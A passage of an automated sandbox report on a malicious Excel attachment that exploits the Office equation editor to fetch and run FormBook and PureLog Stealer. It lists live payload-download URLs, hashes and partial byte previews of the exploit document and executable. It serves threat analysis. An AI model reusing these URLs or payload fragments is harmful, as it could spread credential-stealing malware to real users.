              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_008D00EA mov eax, dword ptr fs:[00000030h]9_2_008D00EA
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_008F26F8 mov eax, dword ptr fs:[00000030h]9_2_008F26F8
              Source: C:\Users\user\AppData\Roaming\winiti.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Injects a PE file into a foreign processes
              Source: C:\Users\user\AppData\Roaming\winiti.exeMemory written: C:\Users\user\AppData\Roaming\winiti.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\winiti.exe "C:\Users\user\AppData\Roaming\winiti.exe" Jump to behavior
              Source: C:\Users\user\AppData\Roaming\winiti.exeProcess created: C:\Users\user\AppData\Roaming\winiti.exe "C:\Users\user\AppData\Roaming\winiti.exe"Jump to behavior
              Source: C:\Users\user\AppData\Roaming\winiti.exeQueries volume information: C:\Users\user\AppData\Roaming\winiti.exe VolumeInformationJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Yara detected FormBook
              Source: Yara matchFile source: 9.2.winiti.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.winiti.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000009.00000002.489032107.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.488998294.0000000000150000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Yara detected PureLog Stealer
              Source: Yara matchFile source: 8.2.winiti.exe.289505c.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.winiti.exe.590000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.winiti.exe.590000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.winiti.exe.289505c.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000008.00000002.414747610.0000000000590000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.415607695.0000000002871000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

              Remote Access Functionality

              barindex
              Yara detected FormBook
              Source: Yara matchFile source: 9.2.winiti.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.winiti.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000009.00000002.489032107.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.488998294.0000000000150000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Yara detected PureLog Stealer
              Source: Yara matchFile source: 8.2.winiti.exe.289505c.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.winiti.exe.590000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.winiti.exe.590000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.winiti.exe.289505c.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000008.00000002.414747610.0000000000590000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.415607695.0000000002871000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information1
              Scripting              		Valid Accounts33
              Exploitation for Client Execution              		1
              Browser Extensions              		111
              Process Injection              		1
              Masquerading              		OS Credential Dumping2
              Security Software Discovery              		Remote Services11
              Archive Collected Data              		1
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/Job1
              Scripting              		1
              DLL Side-Loading              		1
              Disable or Modify Tools              		LSASS Memory1
              Process Discovery              		Remote Desktop ProtocolData from Removable Media14
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAt1
              DLL Side-Loading              		1
              Extra Window Memory Injection              		41
              Virtualization/Sandbox Evasion              		Security Account Manager41
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive3
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
              Process Injection              		NTDS1
              Remote System Discovery              		Distributed Component Object ModelInput Capture23
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
              Deobfuscate/Decode Files or Information              		LSA Secrets1
              File and Directory Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts31
              Obfuscated Files or Information              		Cached Domain Credentials13
              System Information Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items22
              Software Packing              		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              DLL Side-Loading              		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
              Extra Window Memory Injection              		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1483000 Sample: RFQ#51281AOLAI.xls Startdate: 26/07/2024 Architecture: WINDOWS Score: 100 41 tny.wtf 2->41 51 Malicious sample detected (through community Yara rule) 2->51 53 Antivirus detection for URL or domain 2->53 55 Antivirus detection for dropped file 2->55 57 16 other signatures 2->57 8 EXCEL.EXE 57 41 2->8         started        signatures3 process4 dnsIp5 43 104.219.239.104, 49162, 49166, 80 DATAWAGONUS United States 8->43 45 tny.wtf 188.114.97.3, 49161, 49163, 80 CLOUDFLARENETUS European Union 8->45 29 C:\Users\user\...\RFQ#51281AOLAI.xls (copy), Composite 8->29 dropped 31 recreatednewthings...gstohappened[1].doc, Rich 8->31 dropped 12 WINWORD.EXE 336 39 8->12         started        17 winiti.exe 2 8->17         started        file6 process7 dnsIp8 47 tny.wtf 12->47 49 188.114.96.3, 49164, 49165, 80 CLOUDFLARENETUS European Union 12->49 33 C:\Users\user\AppData\Roaming\...\tny.wtf.url, MS 12->33 dropped 35 C:\Users\user\AppData\Roaming\...\dGa.url, MS 12->35 dropped 37 ~WRF{0F8425F3-6468...4-C6330FCC02D5}.tmp, Composite 12->37 dropped 39 C:\Users\user\AppData\Local\...\FFE27256.doc, Rich 12->39 dropped 63 Microsoft Office launches external ms-search protocol handler (WebDAV) 12->63 65 Office viewer loads remote template 12->65 67 Microsoft Office drops suspicious files 12->67 19 EQNEDT32.EXE 12 12->19         started        69 Machine Learning detection for dropped file 17->69 71 Injects a PE file into a foreign processes 17->71 23 winiti.exe 17->23         started        file9 signatures10 process11 file12 25 C:\Users\user\AppData\Roaming\winiti.exe, PE32 19->25 dropped 27 C:\Users\user\AppData\Local\...\winiti[1].exe, PE32 19->27 dropped 59 Office equation editor establishes network connection 19->59 61 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 19->61 signatures13

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              RFQ#51281AOLAI.xls100%Joe Sandbox ML

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{0F8425F3-6468-4181-A134-C6330FCC02D5}.tmp100%AviraEXP/CVE-2017-11882.Gen
              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\recreatednewthingswithentrienewprocesswhichwedidwithouthavingsuchagereatthigstodoever_______greatthingstohappened[1].doc100%AviraHEUR/Rtf.Malformed
              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FFE27256.doc100%AviraHEUR/Rtf.Malformed
              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\winiti[1].exe100%Joe Sandbox ML
              C:\Users\user\AppData\Roaming\winiti.exe100%Joe Sandbox ML

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://104.219.239.104/xampp/bn/recreatednewthingswithentrienewprocesswhichwedidwithouthavingsuchagereatthigstodoever_______greatthingstohappened.doc100%Avira URL Cloudmalware
              http://104.219.239.104/80/winiti.exelay0%Avira URL Cloudsafe
              http://104.219.239.104/80/winiti.exekkC:0%Avira URL Cloudsafe
              http://104.219.239.104/80/winiti.exeRe0%Avira URL Cloudsafe
              http://104.219.239.104/80/winiti.exej0%Avira URL Cloudsafe
              http://104.219.239.104/80/winiti.exe100%Avira URL Cloudmalware
              http://tny.wtf/0%Avira URL Cloudsafe
              http://tny.wtf/dGayX0%Avira URL Cloudsafe
              http://tny.wtf/dGa0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              tny.wtf
              		188.114.97.3
              		truetrue
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://104.219.239.104/80/winiti.exetrue
                • Avira URL Cloud: malware
                		unknown
                http://104.219.239.104/xampp/bn/recreatednewthingswithentrienewprocesswhichwedidwithouthavingsuchagereatthigstodoever_______greatthingstohappened.doctrue
                • Avira URL Cloud: malware
                		unknown
                http://tny.wtf/dGafalse
                • Avira URL Cloud: safe
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://tny.wtf/tny.wtf.url.3.drfalse
                • Avira URL Cloud: safe
                		unknown
                http://tny.wtf/dGayX07330000.0.dr, ~DFA2DBDD95D657A82C.TMP.0.drfalse
                • Avira URL Cloud: safe
                		unknown
                http://104.219.239.104/80/winiti.exeReEQNEDT32.EXE, 00000007.00000002.412730968.00000000005C1000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://104.219.239.104/80/winiti.exelayEQNEDT32.EXE, 00000007.00000002.412730968.00000000005C1000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://104.219.239.104/80/winiti.exekkC:EQNEDT32.EXE, 00000007.00000002.412730968.00000000005C1000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://104.219.239.104/80/winiti.exejEQNEDT32.EXE, 00000007.00000002.412730968.00000000005C1000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown

                World Map of Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public IPs

                IPDomainCountryFlagASNASN NameMalicious
                104.219.239.104
                		unknownUnited States
                		27176DATAWAGONUStrue
                188.114.97.3
                		tny.wtfEuropean Union
                		13335CLOUDFLARENETUStrue
                188.114.96.3
                		unknownEuropean Union
                		13335CLOUDFLARENETUSfalse

                General Information

                Joe Sandbox version:40.0.0 Tourmaline
                Analysis ID:1483000
                Start date and time:2024-07-26 13:39:08 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 7m 35s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:defaultwindowsofficecookbook.jbs
                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                Number of analysed new started processes analysed:11
                Number of new started drivers analysed:1
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • GSI enabled (VBA)
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:RFQ#51281AOLAI.xls
                Detection:MAL
                Classification:mal100.troj.expl.evad.winXLS@7/25@6/3
                EGA Information:
                • Successful, ratio: 66.7%
                HCA Information:
                • Successful, ratio: 88%
                • Number of executed functions: 67
                • Number of non-executed functions: 60
                Cookbook Comments:
                • Found application associated with file extension: .xls
                • Found Word or Excel or PowerPoint or XPS Viewer
                • Attach to Office via COM
                • Active ActiveX Object
                • Active ActiveX Object
                • Scroll down
                • Close Viewer

                Warnings

                • Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe, WMIADAP.exe
                • Execution Graph export aborted for target EQNEDT32.EXE, PID 1256 because there are no executed function
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                • VT rate limit hit for: RFQ#51281AOLAI.xls

                Simulations

                Behavior and APIs

                TimeTypeDescription
                07:40:26API Interceptor62x Sleep call for process: EQNEDT32.EXE modified
                07:40:29API Interceptor11x Sleep call for process: winiti.exe modified

                LLM Input / Output

                InputOutput
                URL: Office document Model: gpt-4o
                ```json
{
  "riskscore": 9,
  "reasons": "The screenshot contains a visually prominent image that appears to be a button or link, with the text 'This document is protected' under a Microsoft Office logo. This can mislead users into thinking they need to click to view the document. The text creates a sense of urgency or necessity to access the document, which is a common tactic in phishing attacks. The use of the Microsoft Office logo impersonates a well-known brand, adding to the credibility of the phishing attempt. The sense of urgency is directly connected to the prominent button-like image, increasing the likelihood of a user clicking on it."
}

                Joe Sandbox View / Context

                IPs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                104.219.239.104RFQ#51281AOLAI.xlsGet hashmaliciousFormBook, PureLog StealerBrowse
                • 104.219.239.104/80/winiti.exe
                RFQ#51281AOLAI.xlsGet hashmaliciousFormBook, PureLog StealerBrowse
                • 104.219.239.104/80/winiti.exe
                irlsever.docGet hashmaliciousFormBookBrowse
                • 104.219.239.104/54/winiti.exe
                54.xlsGet hashmaliciousFormBookBrowse
                • 104.219.239.104/54/winiti.exe
                188.114.97.3DHL Shipment Notification 490104998009.xlsGet hashmaliciousRemcosBrowse
                • tny.wtf/
                Purchase Inquiry.xla.xlsxGet hashmaliciousRemcosBrowse
                • tny.wtf/
                AWD 490104998518.xlsGet hashmaliciousRemcosBrowse
                • tny.wtf/sA
                RFQ#51281AOLAI.xlsGet hashmaliciousFormBook, PureLog StealerBrowse
                • tny.wtf/
                RFQ#51281AOLAI.xlsGet hashmaliciousFormBook, PureLog StealerBrowse
                • tny.wtf/
                #U00d6DEME TAVS#U0130YES#U0130.xlsGet hashmaliciousRemcosBrowse
                • tny.wtf/4Gs
                Notepad3_v6.23.203.2.exeGet hashmaliciousAmadey, GO BackdoorBrowse
                • downloaddining2.com/h9fmdW6/index.php
                Quotation.exeGet hashmaliciousFormBookBrowse
                • www.bahisanaliz16.xyz/ty31/?nfuxZr=JoA2dMXfLBqFXt4x+LwNr+felGYfgJXJPNkjuKbt07zo6G2Rowrau43mkNbOTfffhSkjLsiciQ==&v6AxO=1bjHLvGh8ZYHMfZp
                LisectAVT_2403002B_412.exeGet hashmaliciousFormBookBrowse
                • www.whatareyoucraving.com/drbb/
                AVISO DE PAGO.xlsGet hashmaliciousUnknownBrowse
                • tny.wtf/pqv2p
                188.114.96.3DHL Shipment Notification 490104998009.xlsGet hashmaliciousRemcosBrowse
                • tny.wtf/dg4Zx
                Purchase Inquiry.xla.xlsxGet hashmaliciousRemcosBrowse
                • tny.wtf/c8lH8
                AWD 490104998518.xlsGet hashmaliciousRemcosBrowse
                • tny.wtf/sA
                waybill_shipping_documents_original_BL_CI&PL_26_07_2024_00000000_doc.xlsGet hashmaliciousGuLoader, RemcosBrowse
                • hq.ax/Oi8
                RFQ#51281AOLAI.xlsGet hashmaliciousFormBook, PureLog StealerBrowse
                • tny.wtf/dGa
                RFQ#51281AOLAI.xlsGet hashmaliciousFormBook, PureLog StealerBrowse
                • tny.wtf/
                Quotation.xlsGet hashmaliciousRemcosBrowse
                • tny.wtf/jjJsPX
                xptRc4P9NV.exeGet hashmaliciousUnknownBrowse
                • api.keyunet.cn/v3/Project/appInfo/65fc6006
                LisectAVT_2403002B_448.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                • www.universitetrading.com/hfhf/?6lBX5p6=0/2bsV2tZWehMRII3oIkv/ztWj8eLfm1RPHJ5DhA9wGKWMCN0u1aqYIHkCdH1AqUUdYe&Kjsl=FbuD_t_HwtJdin
                LisectAVT_2403002B_89.exeGet hashmaliciousCobaltStrikeBrowse
                • cccc.yiuyiu.xyz/config.ini

                Domains

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                tny.wtfDHL Shipment Notification 490104998009.xlsGet hashmaliciousRemcosBrowse
                • 188.114.97.3
                Purchase Inquiry.xla.xlsxGet hashmaliciousRemcosBrowse
                • 188.114.97.3
                AWD 490104998518.xlsGet hashmaliciousRemcosBrowse
                • 188.114.96.3
                RFQ#51281AOLAI.xlsGet hashmaliciousFormBook, PureLog StealerBrowse
                • 188.114.96.3
                RFQ#51281AOLAI.xlsGet hashmaliciousFormBook, PureLog StealerBrowse
                • 188.114.96.3
                Quotation.xlsGet hashmaliciousRemcosBrowse
                • 188.114.96.3
                #U00d6DEME TAVS#U0130YES#U0130.xlsGet hashmaliciousRemcosBrowse
                • 188.114.97.3
                AVISO DE PAGO.xlsGet hashmaliciousUnknownBrowse
                • 188.114.97.3
                AVISO DE PAGO.xlsGet hashmaliciousUnknownBrowse
                • 188.114.97.3
                AVISO DE PAGO.xlsGet hashmaliciousUnknownBrowse
                • 188.114.97.3

                ASNs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                CLOUDFLARENETUSPRZELEW BANKOWY.xlsGet hashmaliciousUnknownBrowse
                • 172.67.149.169
                https://dcmonetshare.transfernow.net/dl/20240726wXlk6l3qGet hashmaliciousUnknownBrowse
                • 104.17.25.14
                PRZELEW BANKOWY.xlsGet hashmaliciousUnknownBrowse
                • 104.21.29.191
                DHL Shipment Notification 490104998009.xlsGet hashmaliciousRemcosBrowse
                • 188.114.96.3
                PRZELEW BANKOWY.xlsGet hashmaliciousUnknownBrowse
                • 172.67.149.169
                Fire Safety Partnership.pdfGet hashmaliciousHTMLPhisherBrowse
                • 104.17.25.14
                Purchase Inquiry.xla.xlsxGet hashmaliciousRemcosBrowse
                • 188.114.96.3
                AWD 490104998518.xlsGet hashmaliciousRemcosBrowse
                • 188.114.96.3
                TNS71092E68UI0.vbeGet hashmaliciousFormBookBrowse
                • 104.21.29.136
                https://click.pstmrk.it/3s/www.rxeffect.com/xrJC/8OO2AQ/AQ/7b025ed7-37dd-46f9-8a3c-79d484929f8e/1/x7UnC8G8B9Get hashmaliciousUnknownBrowse
                • 104.16.117.116
                DATAWAGONUSRFQ#51281AOLAI.xlsGet hashmaliciousFormBook, PureLog StealerBrowse
                • 104.219.239.104
                RFQ#51281AOLAI.xlsGet hashmaliciousFormBook, PureLog StealerBrowse
                • 104.219.239.104
                irlsever.docGet hashmaliciousFormBookBrowse
                • 104.219.239.104
                54.xlsGet hashmaliciousFormBookBrowse
                • 104.219.239.104
                CATALOGUE.exeGet hashmaliciousRedLineBrowse
                • 172.81.131.198
                file.exeGet hashmaliciousCMSBruteBrowse
                • 104.219.232.59
                Qzr31SUgrS.rtfGet hashmaliciousRemcosBrowse
                • 104.219.239.56
                1713283209b718b3402f0849bd96c1191ce385ad0742966accbbfb52b7b95b60820687e4a6909.dat-decoded.exeGet hashmaliciousRemcosBrowse
                • 104.219.239.56
                OFFER DETAIL 75645.xlsGet hashmaliciousRemcosBrowse
                • 104.219.239.56
                Vessel Details.exeGet hashmaliciousRemcosBrowse
                • 104.219.239.56
                CLOUDFLARENETUSPRZELEW BANKOWY.xlsGet hashmaliciousUnknownBrowse
                • 172.67.149.169
                https://dcmonetshare.transfernow.net/dl/20240726wXlk6l3qGet hashmaliciousUnknownBrowse
                • 104.17.25.14
                PRZELEW BANKOWY.xlsGet hashmaliciousUnknownBrowse
                • 104.21.29.191
                DHL Shipment Notification 490104998009.xlsGet hashmaliciousRemcosBrowse
                • 188.114.96.3
                PRZELEW BANKOWY.xlsGet hashmaliciousUnknownBrowse
                • 172.67.149.169
                Fire Safety Partnership.pdfGet hashmaliciousHTMLPhisherBrowse
                • 104.17.25.14
                Purchase Inquiry.xla.xlsxGet hashmaliciousRemcosBrowse
                • 188.114.96.3
                AWD 490104998518.xlsGet hashmaliciousRemcosBrowse
                • 188.114.96.3
                TNS71092E68UI0.vbeGet hashmaliciousFormBookBrowse
                • 104.21.29.136
                https://click.pstmrk.it/3s/www.rxeffect.com/xrJC/8OO2AQ/AQ/7b025ed7-37dd-46f9-8a3c-79d484929f8e/1/x7UnC8G8B9Get hashmaliciousUnknownBrowse
                • 104.16.117.116

                JA3 Fingerprints

                No context

                Dropped Files

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\winiti[1].exeRFQ#51281AOLAI.xlsGet hashmaliciousFormBook, PureLog StealerBrowse
                  RFQ#51281AOLAI.xlsGet hashmaliciousFormBook, PureLog StealerBrowse
                    C:\Users\user\AppData\Roaming\winiti.exeRFQ#51281AOLAI.xlsGet hashmaliciousFormBook, PureLog StealerBrowse
                      RFQ#51281AOLAI.xlsGet hashmaliciousFormBook, PureLog StealerBrowse

                        Created / dropped Files

                        C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD (copy)

                        Download File
                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):131072
                        Entropy (8bit):0.025622775596003594
                        Encrypted:false
                        SSDEEP:6:I3DPcvvHvxggLRRylergtL24pRXv//4tfnRujlw//+GtluJ/eRuj:I3DPoPFravYg3J/
                        MD5:698BBCA2DB04511F83DCF24831F9806C
                        SHA1:EBF80C31EE49812A30D6B0EFB14A5AD2D95A2669
                        SHA-256:1325CAC1E83D907D5DBC99B451C4A3E11A166913AFD7860A84A7CE6F7AD33940
                        SHA-512:07A907AF4E44010B6BB189F8B3A180AD8529F05C7B793F0205E1C88DB2EDC1C665F2F1F9D390B07D1C5B0E753111BAB9200E4FEA58B644ACF6B40E1171914700
                        Malicious:false
                        Reputation:low
                        Preview:......M.eFy...z.n..gs.H...g;...S,...X.F...Fa.q............................F/L..\sN..<d.J.Y........1...G.IH...e.Lo......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\recreatednewthingswithentrienewprocesswhichwedidwithouthavingsuchagereatthigstodoever_______greatthingstohappened[1].doc

                        Download File
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:Rich Text Format data, version 1
                        Category:dropped
                        Size (bytes):84055
                        Entropy (8bit):2.564253730925419
                        Encrypted:false
                        SSDEEP:384:kwiGEC30k0fWHuaN6oQeO3seC31xcxwV+k629/sYdhpfsl4ZnxP941:N1WWPNxssN31xcxc+kRsYdkl4Znr0
                        MD5:0A9C028203A8416BE8DB7371550D0FB5
                        SHA1:2F576CDFBF4F60918676F6583265C504BDEEFA21
                        SHA-256:A424C4312F97747EFA22A627AA0C77C4F11022D171E11D3EEFF00DD77B737520
                        SHA-512:51D92688ABEE365F550552C565EBC422000C6CDF6A0E58528922BDE4323906CD85D3DCF7D29FB52ADF9CDC4C59E3310704A25657B5A9683ED041087F7DB01B69
                        Malicious:true
                        Yara Hits:
                        • Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\recreatednewthingswithentrienewprocesswhichwedidwithouthavingsuchagereatthigstodoever_______greatthingstohappened[1].doc, Author: ditekSHen
                        Antivirus:
                        • Antivirus: Avira, Detection: 100%
                        Reputation:low
                        Preview:{\rtf1.............{\*\groupTop920443172 \(}.{\664116854/<`?2:.~57$-|-+],|2/?5$,;^?+!.8/.~]%...6^3/;8.4#[..?>):5@2=?0??97(+.6.#+`'5:);*(5??@7.;6?&4%:25[756?1?^].&[&&&+*>7-%1?8?%6$*!;|#?_20=/!~+'%?:?%[4']?/,|?`8(?_#/)1|>9%-```6.64;073*%%,$?3%</''@/_9'.?.4`_,#1$`>5#*?6<~<'?=;&%0&#?/.?*$?.&..7]#?.?~?%,?#8/'&):?.4$?77*4*^70?6?-..)^_`?9=:%`..|$+?]'0~]._1,;!.7.~??29`;:?<?_[^?5*@_0_6*,?>;.-?>10@|@*=*?!>,]`2,':**[3#7]?8>2$~@.1?,-%?7'.<&@+)|-'*!4!2&?72&=5]#/?`_|&,-)$@9_2$,&+)7`2>/.%<?#+&_`:3^/'1=2%-'7`%5%..99?6+%`+0.?>1$%8_%?%0[)()!.<%*?%&~-#.9??:&!-5~2#10]|?7('?~^[6.-'`$)=`%?97(9<5;-6?@~?.0[.00`%3+#4`8...48,>-?_.@.%>7[!~7?)86,)@*&/?7`!..-$%;21.>2&<-.%[5-/|&+:7@2!4+~`.[?=@'=+.(?,1/&!|.>1.&,5.'&|4:*3.|7.~+,,=*~@.[.36%/!.&(#&`..?8-1?*(_)_,8#]'=..!?_%?%?,9.4***?4[-5$$?6==,=''1~%*~.,25~;.=7`[<*].87/.?.;89[>.).|;?8^??5:^:0^*]07?9??*/+?<@6727:?_!>+?`-8%?'':)8`>-.-#7(/3)]??%@6%68<~)16!|:%|^?>4=4:[..;_?@'^>`#..1$?%/3^;.=`^.$><?^..]:+./7/7.<26$5=??*~19-|6|$?5/!(58,`?.6:)1_5)[|?/'-0::8?.9'52(:%~22+4))&3*

                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\winiti[1].exe

                        Download File
                        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                        Category:dropped
                        Size (bytes):951296
                        Entropy (8bit):7.752827643333699
                        Encrypted:false
                        SSDEEP:24576:yXRv6h6aYfy8hbsv4IFlwLa15cAJAiV8KObLDCmCeBaOmXi:4JpTw8kJH8hCmvAOGi
                        MD5:1F5C95D40C06C01300F0A6592945A72D
                        SHA1:79A217ED19833EFCF640FFD8BB04803E9F30D6F4
                        SHA-256:434EC59B680788BAE7F2935200A77E681CECBB517D853C6E6CF31F4CF112E5CC
                        SHA-512:3CD70090E071E43B22A3638D8CDF13874C5DA34AFF2CB314E170FEDA59D630594314F45708797D83A47ED645A7F07755AC10F4A438858E6673CE560FE5F57975
                        Malicious:true
                        Antivirus:
                        • Antivirus: Joe Sandbox ML, Detection: 100%
                        Joe Sandbox View:
                        • Filename: RFQ#51281AOLAI.xls, Detection: malicious, Browse
                        • Filename: RFQ#51281AOLAI.xls, Detection: malicious, Browse
                        Reputation:low
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...`.f..............0..x............... ........@.. ....................................@....................................O...................................(m..T............................................ ............... ..H............text...$v... ...x.................. ..`.rsrc................z..............@..@.reloc..............................@..B........................H...........LU......I...PZ.................................................}.....r...p}......}.....(.......(.....*...}.....r...p}......}.....(.......(.......}....*..0..............r...ps......o.....r...p...s.....s......s.........o....&..o.....o....}.....{.....{....o.............o....( ...&.......o!......*.........._b.. .......tw.......0............{....r...po".....{....r...po".....{....r...po".....{.....{.....%.o#.....o#.....{....r...po".....{....r...po".....{....r...po".....

                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\34AF59AF.emf

                        Download File
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                        Category:dropped
                        Size (bytes):3193556
                        Entropy (8bit):4.049018355083669
                        Encrypted:false
                        SSDEEP:12288:711gPI5R32GnjPjIwcusrwvsWXKcnXfxpMZacUkRaN7Hjo1PWwVD8dt3iGnjPjIJ:7jgOR30wOSKx1OwVat3wwKuWh1Owb
                        MD5:762C6A27FE6DF812EE45907EB47438A3
